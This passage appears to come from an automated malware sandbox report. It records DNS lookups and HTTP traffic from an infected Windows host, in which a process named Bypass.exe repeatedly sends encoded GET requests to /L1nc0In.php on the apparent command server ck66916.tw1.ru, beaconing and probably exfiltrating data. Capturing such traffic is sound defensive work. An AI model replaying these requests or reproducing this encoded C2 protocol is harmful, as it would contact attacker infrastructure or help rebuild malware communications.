                        Jun 23, 2024 06:57:36.272878885 CEST4978580192.168.2.492.53.96.121
                        Jun 23, 2024 06:57:36.277013063 CEST804978492.53.96.121192.168.2.4
                        Jun 23, 2024 06:57:36.277069092 CEST4978480192.168.2.492.53.96.121
                        Jun 23, 2024 06:57:36.277728081 CEST804978592.53.96.121192.168.2.4
                        Jun 23, 2024 06:57:36.277936935 CEST4978580192.168.2.492.53.96.121
                        Jun 23, 2024 06:57:36.277936935 CEST4978580192.168.2.492.53.96.121
                        Jun 23, 2024 06:57:36.282892942 CEST804978592.53.96.121192.168.2.4
                        Jun 23, 2024 06:57:36.283199072 CEST804978592.53.96.121192.168.2.4
                        Jun 23, 2024 06:57:37.000525951 CEST804978592.53.96.121192.168.2.4
                        Jun 23, 2024 06:57:37.052491903 CEST4978580192.168.2.492.53.96.121
                        Jun 23, 2024 06:57:42.006794930 CEST4978580192.168.2.492.53.96.121
                        Jun 23, 2024 06:57:42.006794930 CEST4978680192.168.2.492.53.96.121
                        Jun 23, 2024 06:57:42.012186050 CEST804978692.53.96.121192.168.2.4
                        Jun 23, 2024 06:57:42.012403965 CEST804978592.53.96.121192.168.2.4
                        Jun 23, 2024 06:57:42.012608051 CEST4978580192.168.2.492.53.96.121
                        Jun 23, 2024 06:57:42.012608051 CEST4978680192.168.2.492.53.96.121
                        Jun 23, 2024 06:57:42.012749910 CEST4978680192.168.2.492.53.96.121
                        Jun 23, 2024 06:57:42.017668962 CEST804978692.53.96.121192.168.2.4
                        Jun 23, 2024 06:57:42.017714977 CEST804978692.53.96.121192.168.2.4
                        Jun 23, 2024 06:57:42.723964930 CEST804978692.53.96.121192.168.2.4
                        Jun 23, 2024 06:57:42.771337032 CEST4978680192.168.2.492.53.96.121
                        Jun 23, 2024 06:57:47.741519928 CEST4978780192.168.2.492.53.96.121
                        Jun 23, 2024 06:57:47.741611004 CEST4978680192.168.2.492.53.96.121
                        Jun 23, 2024 06:57:47.746722937 CEST804978792.53.96.121192.168.2.4
                        Jun 23, 2024 06:57:47.746747017 CEST804978692.53.96.121192.168.2.4
                        Jun 23, 2024 06:57:47.746824980 CEST4978780192.168.2.492.53.96.121
                        Jun 23, 2024 06:57:47.746974945 CEST4978680192.168.2.492.53.96.121
                        Jun 23, 2024 06:57:47.747111082 CEST4978780192.168.2.492.53.96.121
                        Jun 23, 2024 06:57:47.751920938 CEST804978792.53.96.121192.168.2.4
                        Jun 23, 2024 06:57:47.752223969 CEST804978792.53.96.121192.168.2.4
                        Jun 23, 2024 06:57:48.455339909 CEST804978792.53.96.121192.168.2.4
                        Jun 23, 2024 06:57:48.505557060 CEST4978780192.168.2.492.53.96.121
                        Jun 23, 2024 06:57:53.465369940 CEST4978780192.168.2.492.53.96.121
                        Jun 23, 2024 06:57:53.471139908 CEST804978792.53.96.121192.168.2.4
                        Jun 23, 2024 06:57:53.471323967 CEST4978880192.168.2.492.53.96.121
                        Jun 23, 2024 06:57:53.476253986 CEST804978892.53.96.121192.168.2.4
                        Jun 23, 2024 06:57:53.476332903 CEST4978780192.168.2.492.53.96.121
                        Jun 23, 2024 06:57:53.480514050 CEST4978880192.168.2.492.53.96.121
                        Jun 23, 2024 06:57:53.480514050 CEST4978880192.168.2.492.53.96.121
                        Jun 23, 2024 06:57:53.485631943 CEST804978892.53.96.121192.168.2.4
                        Jun 23, 2024 06:57:53.485894918 CEST804978892.53.96.121192.168.2.4
                        Jun 23, 2024 06:57:54.204020977 CEST804978892.53.96.121192.168.2.4
                        Jun 23, 2024 06:57:54.257292986 CEST4978880192.168.2.492.53.96.121
                        Jun 23, 2024 06:57:59.209139109 CEST4978880192.168.2.492.53.96.121
                        Jun 23, 2024 06:57:59.210114956 CEST4978980192.168.2.492.53.96.121
                        Jun 23, 2024 06:57:59.214467049 CEST804978892.53.96.121192.168.2.4
                        Jun 23, 2024 06:57:59.214534998 CEST4978880192.168.2.492.53.96.121
                        Jun 23, 2024 06:57:59.214862108 CEST804978992.53.96.121192.168.2.4
                        Jun 23, 2024 06:57:59.214992046 CEST4978980192.168.2.492.53.96.121
                        Jun 23, 2024 06:57:59.215189934 CEST4978980192.168.2.492.53.96.121
                        Jun 23, 2024 06:57:59.219930887 CEST804978992.53.96.121192.168.2.4
                        Jun 23, 2024 06:57:59.220078945 CEST804978992.53.96.121192.168.2.4
                        Jun 23, 2024 06:57:59.939810038 CEST804978992.53.96.121192.168.2.4
                        Jun 23, 2024 06:57:59.990437984 CEST4978980192.168.2.492.53.96.121
                        TimestampSource PortDest PortSource IPDest IP
                        Jun 23, 2024 06:54:14.556972980 CEST5670353192.168.2.41.1.1.1
                        Jun 23, 2024 06:54:14.569299936 CEST53567031.1.1.1192.168.2.4
                        Jun 23, 2024 06:54:19.153496027 CEST4984153192.168.2.41.1.1.1
                        Jun 23, 2024 06:54:19.206234932 CEST53498411.1.1.1192.168.2.4
                        Jun 23, 2024 06:54:20.099349976 CEST6171153192.168.2.41.1.1.1
                        Jun 23, 2024 06:54:20.106935024 CEST53617111.1.1.1192.168.2.4
                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Jun 23, 2024 06:54:14.556972980 CEST192.168.2.41.1.1.10x4803Standard query (0)backcreammykiel.shopA (IP address)IN (0x0001)false
                        Jun 23, 2024 06:54:19.153496027 CEST192.168.2.41.1.1.10xebe6Standard query (0)ck66916.tw1.ruA (IP address)IN (0x0001)false
                        Jun 23, 2024 06:54:20.099349976 CEST192.168.2.41.1.1.10xfcb9Standard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Jun 23, 2024 06:54:14.569299936 CEST1.1.1.1192.168.2.40x4803No error (0)backcreammykiel.shop104.21.90.18A (IP address)IN (0x0001)false
                        Jun 23, 2024 06:54:14.569299936 CEST1.1.1.1192.168.2.40x4803No error (0)backcreammykiel.shop172.67.151.5A (IP address)IN (0x0001)false
                        Jun 23, 2024 06:54:19.206234932 CEST1.1.1.1192.168.2.40xebe6No error (0)ck66916.tw1.ru92.53.96.121A (IP address)IN (0x0001)false
                        Jun 23, 2024 06:54:20.106935024 CEST1.1.1.1192.168.2.40xfcb9No error (0)ipinfo.io34.117.186.192A (IP address)IN (0x0001)false
                        • ipinfo.io
                        • backcreammykiel.shop
                        • ck66916.tw1.ru
                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.44974192.53.96.121807004C:\ProgramData\SoftwareDistribution\Bypass.exe
                        TimestampBytes transferredDirectionData
                        Jun 23, 2024 06:54:19.222657919 CEST415OUTGET /L1nc0In.php?iUu=8R7Isg&ee5ae8efe50125d60098b1ca132932bc=49479fbd79a245ee458d40f1dd85aa54&650a0c21718513cd4feada722441e9dc=gMjRGOkJjYmNWNxMmYiZzMiVTN1UmNhBzNzMTZldTY4kTYxUWNwQmN&iUu=8R7Isg HTTP/1.1
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: ck66916.tw1.ru
                        Connection: Keep-Alive
                        Jun 23, 2024 06:54:20.024810076 CEST603INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:54:19 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 440
                        Connection: keep-alive
                        Data Raw: 39 4a 53 59 6c 68 44 4f 30 67 6a 5a 68 68 7a 59 78 4d 6a 4d 6d 4a 6a 59 6c 52 6d 59 79 51 6a 4d 6c 68 44 4d 77 6b 6a 59 35 51 7a 4d 68 4a 69 4f 69 55 44 4e 30 67 44 4d 68 56 32 4d 6c 64 6a 4d 34 59 57 4d 69 5a 57 4e 77 55 7a 4e 6d 5a 57 59 69 46 7a 4e 34 51 32 4e 6d 4a 57 4d 69 77 69 49 69 6f 6a 49 32 4d 6d 5a 77 49 6a 4e 79 67 54 59 31 59 7a 4d 35 49 47 4e 69 46 47 4f 30 67 44 4e 78 51 54 4f 32 4d 44 5a 6b 6c 54 5a 77 45 6d 49 73 49 69 54 58 31 6b 4d 4e 64 55 4e 6f 4a 32 52 4b 78 6d 59 79 49 31 63 68 64 56 55 39 49 69 4f 69 4d 57 4e 6a 46 57 5a 35 67 7a 4e 79 55 6d 4e 35 49 6a 4d 77 49 57 4f 35 51 44 5a 6c 56 32 59 6c 56 7a 59 35 45 6a 4e 6c 5a 44 5a 69 77 69 49 30 51 7a 59 78 45 57 5a 30 4d 7a 59 33 41 6a 4e 6d 68 44 4d 6c 4e 6d 4e 35 6b 44 5a 30 41 7a 4d 79 6b 6a 59 77 59 54 4e 32 49 6d 49 36 49 69 59 35 59 54 4f 6a 4a 7a 4e 35 55 6a 4d 6a 46 47 4d 6d 4a 57 4d 31 59 57 4f 79 55 7a 59 6b 56 54 59 33 41 54 4f 32 59 54 4e 79 49 43 4c 69 49 32 4d 79 59 6d 4d 6d 4a 32 59 6a 42 7a 59 34 4d 7a 59 78 51 [TRUNCATED]
                        Data Ascii: 9JSYlhDO0gjZhhzYxMjMmJjYlRmYyQjMlhDMwkjY5QzMhJiOiUDN0gDMhV2MldjM4YWMiZWNwUzNmZWYiFzN4Q2NmJWMiwiIiojI2MmZwIjNygTY1YzM5IGNiFGO0gDNxQTO2MDZklTZwEmIsIiTX1kMNdUNoJ2RKxmYyI1chdVU9IiOiMWNjFWZ5gzNyUmN5IjMwIWO5QDZlV2YlVzY5EjNlZDZiwiI0QzYxEWZ0MzY3AjNmhDMlNmN5kDZ0AzMykjYwYTN2ImI6IiY5YTOjJzN5UjMjFGMmJWM1YWOyUzYkVTY3ATO2YTNyICLiI2MyYmMmJ2YjBzY4MzYxQzNwQWO2UTNjRjZkFDOjhzNiFWMjRmZhJzNxMTMzEzM2cTM2kTO0IjI6IiNlFGMyQmZxIDMhRDM3EDZzEDZ2AzYlFzMiRDNjZWO4Iye
                        Jun 23, 2024 06:54:20.069186926 CEST758OUTGET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&1ee1ab9261adb8cfddd516f369c274e1=0VfiIiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiI2kDO5gzN1YmYiBDOwQmN5AjNllDM4cTO2EDM5UTNklTY3MzMidDOhJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: ck66916.tw1.ru
                        Jun 23, 2024 06:54:20.290112019 CEST161INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:54:20 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 0
                        Connection: keep-alive
                        Jun 23, 2024 06:54:20.290936947 CEST826OUTGET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&37532c7004eeb8757d3cb2e9a0f20a99=0VfiAjRaxmUuNGaSNzYnRzVh5mVIJWUCNFTntGVNZTUU5kNBRUTnFlaNdXS6xkMBpHT6lkeXJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiI2kDO5gzN1YmYiBDOwQmN5AjNllDM4cTO2EDM5UTNklTY3MzMidDOhJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: ck66916.tw1.ru
                        Jun 23, 2024 06:54:20.339663029 CEST758OUTGET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&1ee1ab9261adb8cfddd516f369c274e1=0VfiIiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIhFWN4YzY5IjZyIWZ5gTZycjY3EDOyYzYwAzN0YmM5MmZwcTZhNWY3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: ck66916.tw1.ru
                        Jun 23, 2024 06:54:20.514467001 CEST161INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:54:20 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 0
                        Connection: keep-alive
                        Jun 23, 2024 06:54:20.645796061 CEST161INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:54:20 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 0
                        Connection: keep-alive
                        Jun 23, 2024 06:54:20.646226883 CEST2803OUTGET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&37532c7004eeb8757d3cb2e9a0f20a99=d1nIRZWa0IjYwJFWklGbtNGMOhVYFZVbjhGZIRWb5ITVjhnVZBjRHJFdG12YulTbjFFeGhlNNtWS2k0QhBjRHVVa3lWS1R2MiVHdtJmVKl2Tpd2RkhmQGpVe5ITW6x2RSl2dplUavpWSvJFWZFVMXlVekdlWzZ1RWl2dplUavpWS6JESjJUMXlFbSNTVpdXaJVHZzIWd01mYWpUaPlWUVNVeWJzYWFzVZxmUzUVa3lWS1R2MiVHdtJmVKl2TplEWapnVWJGaWdEZUp0QMlGNyQmd1ITY1ZFbJZTS5pVdGdEV0Z0VaBjTsl0cJlmYzkTbiJXNXZVavpWSvJFWZFVMXlFbSNTVpdXaJhmWqlFaxMUT0klaOJTUE1Ua05GT5IERNdXQE10dBRUT1VkaMdHND10NKl2Tp1EWaVXOHF2d502Yqx2VUl2dplUavpWS6FzVZpmSXpFWKNETpRzRYlHeW1kWGVEVR5kVTVEeGhVd3ZEWjhHbJZTS5NWdWdlW55kMVl2dplUdkNjY1RXbiZlSp9UaBZ1UPZURUl2dpl0QkVUSwkUaPlGMVF1UKNETpRjMkZXNyEWdWxWS2k0QiNnRyQGbKhVYHp0QMlWSYp1a1clWtZ1RSdWTzQmdS1mYwRGbJZTS5NWMKhVYyw2RkVnRrl0cJlWUIpVRXJTSp9Ua0IjYw5kbjxmWxUFUstWUpdXaJlXUE9EeFpWT4VkaNlHND5kM [TRUNCATED]
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: ck66916.tw1.ru
                        Jun 23, 2024 06:54:20.868113995 CEST161INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:54:20 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 0
                        Connection: keep-alive


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        1192.168.2.44974592.53.96.121807004C:\ProgramData\SoftwareDistribution\Bypass.exe
                        TimestampBytes transferredDirectionData
                        Jun 23, 2024 06:54:20.318283081 CEST2197OUTGET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=d1nIiojIyQGM3ImNjJGOiNDOjJTZ4kjNmZWZ4U2M5ETOiZDOkBjIsISZkdDZjNjN1kDO4YzNzMmNzUGNidDOmRWO4ATM1EjYyEDN3U2YkFzNiojIjZTNiBzNjNWMkBDO0Y2N1YjNwIWZxcDN0UjM2MDM4UjIsIiN3Q2YkRjYxkDZilDNilzN0EmNlZzNkJGO5MjYjZWZ0ATYlZWMwYmNiojI5YDN4EDNxAzMiBjMlZTO0UzYwMWYlhDNjVWZwMGMjhjI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzl0UaJDbHRmaGtWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpRzVkNlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV [TRUNCATED]
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: ck66916.tw1.ru
                        Jun 23, 2024 06:54:21.035774946 CEST267INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:54:20 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 104
                        Connection: keep-alive
                        Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65
                        Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        2192.168.2.44974892.53.96.121807004C:\ProgramData\SoftwareDistribution\Bypass.exe
                        TimestampBytes transferredDirectionData
                        Jun 23, 2024 06:54:22.060933113 CEST731OUTGET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIjhzN1kDN5EDOkVTNiVzNwUWN4IWZmBTM1cTO3kjZwEjMzUjZkhjYjJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: ck66916.tw1.ru
                        Connection: Keep-Alive
                        Jun 23, 2024 06:54:22.750040054 CEST267INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:54:22 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 104
                        Connection: keep-alive
                        Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4d 7a 45 7a 59 79 51 57 4d 33 63 44 4f 6a 56 6d 4e 33 49 32 4e 34 55 54 5a 35 41 54 4e 6a 4a 6d 5a 6d 4e 44 5a 32 45 47 5a 68 4a 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65
                        Data Ascii: ==Qf9JiI6ICMzEzYyQWM3cDOjVmN3I2N4UTZ5ATNjJmZmNDZ2EGZhJye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        3192.168.2.44975092.53.96.121807004C:\ProgramData\SoftwareDistribution\Bypass.exe
                        TimestampBytes transferredDirectionData
                        Jun 23, 2024 06:54:26.072940111 CEST2201OUTGET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=d1nIiojIyQGM3ImNjJGOiNDOjJTZ4kjNmZWZ4U2M5ETOiZDOkBjIsISZkdDZjNjN1kDO4YzNzMmNzUGNidDOmRWO4ATM1EjYyEDN3U2YkFzNiojIjZTNiBzNjNWMkBDO0Y2N1YjNwIWZxcDN0UjM2MDM4UjIsIiN3Q2YkRjYxkDZilDNilzN0EmNlZzNkJGO5MjYjZWZ0ATYlZWMwYmNiojI5YDN4EDNxAzMiBjMlZTO0UzYwMWYlhDNjVWZwMGMjhjI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpRzVkNlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJ [TRUNCATED]
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: ck66916.tw1.ru
                        Jun 23, 2024 06:54:26.761868000 CEST267INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:54:26 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 104
                        Connection: keep-alive
                        Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65
                        Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye
                        Jun 23, 2024 06:54:26.974541903 CEST267INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:54:26 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 104
                        Connection: keep-alive
                        Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65
                        Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        4192.168.2.44975192.53.96.121807004C:\ProgramData\SoftwareDistribution\Bypass.exe
                        TimestampBytes transferredDirectionData
                        Jun 23, 2024 06:54:31.777179003 CEST2201OUTGET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=d1nIiojIyQGM3ImNjJGOiNDOjJTZ4kjNmZWZ4U2M5ETOiZDOkBjIsISZkdDZjNjN1kDO4YzNzMmNzUGNidDOmRWO4ATM1EjYyEDN3U2YkFzNiojIjZTNiBzNjNWMkBDO0Y2N1YjNwIWZxcDN0UjM2MDM4UjIsIiN3Q2YkRjYxkDZilDNilzN0EmNlZzNkJGO5MjYjZWZ0ATYlZWMwYmNiojI5YDN4EDNxAzMiBjMlZTO0UzYwMWYlhDNjVWZwMGMjhjI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpRzVkNlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN